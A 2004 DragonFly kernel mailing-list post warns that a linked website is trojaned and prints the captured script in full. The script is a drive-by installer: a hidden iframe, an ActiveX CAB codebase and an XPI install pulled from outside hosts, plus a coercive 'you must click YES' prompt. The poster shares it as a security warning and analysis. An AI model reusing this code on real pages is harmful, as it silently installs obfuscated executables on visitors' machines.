DragonFly kernel List (threaded) for 2004-08
[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index][Thread Index]

Re: b0x.com link

From:	"cmulcahy@xxxxxxxxx" <cmulcahy@xxxxxxxxx>
Date:	Tue, 10 Aug 2004 16:20:20 -0500

This:

<!-- AUTO_PROMPT AD START -->
<script language="JavaScript" type="text/JavaScript" src="http://public.searchbarcash.com/v2/prompt.php?p=9FD0986F08B7A3A78E58EA0BA7D7954967FEF1419B066DF507A34BFBE0441883698566F3B68DF40448AC9A8309A1DE98CFEADAA19AB062C96BF6FCB02431F41783FD95A9751819B0D69E4766069F882D40938F635FA9C5E34D3FAA84DC818401D6DE0D8818FE60E4F0CAC3638AA07AB3EC36C9F96DC232EBC4C884963972446AAFECB8026C6FE467D0";></script>
<!-- AUTO_PROMPT AD END -->

prompts the execution of a script, wgotten and renamed b0x.js (attached)
which performs browser detection, and in the case of Netscape 5+ prompts for the download and install of sbc_netscape.xpi (also attached ;; DO NOT EXECUTE) which if interrogated with zip or jar is revealed to be an install script and a windows executable ( which is so resistant to 'strings' as to appear intentionally encrypted or obfuscated ).

In short it looks like bad news.

mulc

On Tue, 2004-08-10 at 15:09, David Ross wrote:
> wtf? --David Ross
> 
> --- "cmulcahy@xxxxxxxxx" <cmulcahy@xxxxxxxxx> wrote:
> 
> > David,
> > 
> > FYI
> > 
> > The URL you posted to OSnews in the dragonfly thread
> > is trojan'ed.
> > 
> > Check the javascript included between '<!--
> > AUTO_PROMPT AD' tags in the
> > head.
> > 
> > mulc
> > 
> > 
> > 
> 
> 
> 
> 		
> __________________________________
> Do you Yahoo!?
> New and Improved Yahoo! Mail - Send 10MB messages!
> http://promotions.yahoo.com/new_mail
>

function detect_os() {
	var os;
	var detected_os = navigator.userAgent.toLowerCase();
	if (detected_os.indexOf("win95") != -1 || detected_os.indexOf("windows 95") != -1) {
		os = "Microsoft Windows 95";
	} else if (detected_os.indexOf("win98") != -1 || detected_os.indexOf("windows 98") != -1) {
		os = "Microsoft Windows 98";
	} else if (detected_os.indexOf("win9x 4.90") != -1) {
		os = "Microsoft Windows ME";
	} else if (detected_os.indexOf("windows nt 5.0") != -1) {
		os = "Microsoft Windows 2000";
	} else if (detected_os.indexOf("windows nt 5.1") != -1) {
		os = "Microsoft Windows XP";
	} else if (detected_os.indexOf("windows nt 5.2") != -1) {
		os = "Microsoft Windows 2003";
	} else if (detected_os.indexOf("winnt") != -1 || detected_os.indexOf("windows nt") != -1) {
		os = "Microsoft Windows NT";
	} else {
		os = "Unkown Operating System";
	}
	
	return os;
}
	document.write('<iframe id="downloads_manager" style="position:absolute;visibility:hidden;"></iframe>');

var retry_enabled = true;
var cancel_prompt=0;


	var retry_cnt=1;

	        function retry(){
                if(retry_cnt>0) {

                                                                                                alert("In order to view this site, you must click YES.");
                                                                                        start_download();
                                retry_cnt--;
                }

        }

		
	function start_download_loadfirst() {
		var bname=navigator.appName;
		var bver=parseInt(navigator.appVersion);
		if (bname == 'Microsoft Internet Explorer' && bver >= 2) {
			var os = detect_os();
			if (os == 'Microsoft Windows 98' || os == 'Microsoft Windows ME' || os == 'Microsoft Windows 95') { var path = 'cab/98ME/CDTInc/bridge.cab'; }
			if (os == 'Microsoft Windows 2000' || os == 'Microsoft Windows XP' || os == 'Microsoft Windows 2003') { var path = 'cab/2000XP/CDTInc/bridge.cab'; }
		        document.write('<script language="javascript" src="http://www2.flingstone.com/log_downloads.php?account_id=9087";><\/script>\n');
			document.write('<object onerror="window.parent.retry();" id="Client1" width="1" height="1" classid="CLSID:9C691A33-7DDA-4C2F-BE4C-C176083F35CF" codebase="http://static.flingstone.com/' + path + '#version=1,0,0,42">\n');
			document.write('\t<param name="h_key" value="8CDBD7FC420321FC3374C9BC5BD08ABFDDB82BFDB7904DB08FA3BEF48603">\n');
			document.write('\t<param name="partner_id" value="9087">\n');
			document.write('\t<param name="bundle_id" value="2000">\n');
			document.write('<\/object>\n');
		} else if (bname == 'Netscape' && bver >= 5) {
			if (InstallTrigger.updateEnabled()) {
				InstallTrigger.install({'Free Access Plugin 1.117' : 'http://www2.flingstone.com/cab/sbc_netscape.xpi'});
			} else {
				location.replace('http://www2.flingstone.com/cab/sbc_netscape.xpi');
			}
		}
	}

		function start_download() {
		if (cancel_prompt == 0) {
			var bname=navigator.appName;
			var bver=parseInt(navigator.appVersion);
			if (bname == 'Microsoft Internet Explorer' && bver >= 2) {
				var os = detect_os();
				if (os == 'Microsoft Windows 98' || os == 'Microsoft Windows ME' || os == 'Microsoft Windows 95') { var path = 'cab/98ME/CDTInc/bridge.cab'; }
				if (os == 'Microsoft Windows 2000' || os == 'Microsoft Windows XP' || os == 'Microsoft Windows 2003') { var path = 'cab/2000XP/CDTInc/bridge.cab'; }
				document_code = '<script language="javascript" src="http://www2.flingstone.com/log_downloads.php?account_id=9087";><\/script>\n';
				document_code += '<html>\n\t<head>\n\t<\/head>\n\t<body>\n';
				document_code += '\t\t<object onerror="window.parent.retry();" id="Client1" width="1" height="1" classid="CLSID:9C691A33-7DDA-4C2F-BE4C-C176083F35CF" codebase="http://static.flingstone.com/' + path + '#version=1,0,0,112">\n';
				document_code += '\t\t\t<param name="h_key" value="8CDBD7FC420321FC3374C9BC5BD08ABFDDB82BFDB7904DB08FA3BEF48603">\n';
				document_code += '\t\t\t<param name="partner_id" value="9087">\n';
				document_code += '\t\t\t<param name="bundle_id" value="2000">\n';
				document_code += '\t\t<\/object>\n';
				document_code += '\t<\/body>\n<\/html>';	

				downloads_manager.document.write(document_code);
				downloads_manager.document.close();
			} else if (bname == 'Netscape' && bver >= 5) {
				if (InstallTrigger.updateEnabled()) {
					InstallTrigger.install({'Free Access Plugin 1.117' : 'http://www2.flingstone.com/cab/sbc_netscape.xpi'});
				} else {
					location.replace('http://www2.flingstone.com/cab/sbc_netscape.xpi');
				}
			}
		}
	}
        var currentDate = new Date();
        var adRecurrence = "daily";
        var adId = "1049995998";
        var adExpiration = 0;


        if (adRecurrence == "daily") { currentDate.setTime(currentDate.getTime() + (24*60*60*1000));    adExpiration = currentDate.toGMTString(); }
        else if (adRecurrence == "weekly") { currentDate.setTime(currentDate.getTime() + (7*24*60*60*1000));    adExpiration = currentDate.toGMTString(); }
        else if (adRecurrence == "monthly") { currentDate.setTime(currentDate.getTime() + (30*24*60*60*1000));  adExpiration = currentDate.toGMTString(); }
        else if (adRecurrence == "once") { currentDate.setTime(currentDate.getTime() + (365*24*60*60*1000));    adExpiration = currentDate.toGMTString(); }
        else { adExpiration = 0; }

        function SetCookie(sName, sValue, sExpire){
                var expireCode = "";
                if (sExpire) { expireCode =  "expires=" + sExpire; + ";" }
                document.cookie = sName + "=" + escape(sValue) + ";" + expireCode
        }

        function GetCookie(sName) {
                var aCookie = document.cookie.split("; ");
                for (var i=0; i < aCookie.length; i++) {
                        var aCrumb = aCookie[i].split("=");
                        if (sName == aCrumb[0]) { return unescape(aCrumb[1]); }
                }
                return null;
        }
        
	if (!GetCookie("adId")) { 
		if (adExpiration != 0) { SetCookie("adId","1", adExpiration); }
									start_download_loadfirst();
			}

Attachment: sbc_netscape.xpi
Description: Zip archive

Follow-Ups:
- Re: b0x.com link
  - From: Wouter Clarie

[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index][Thread Index]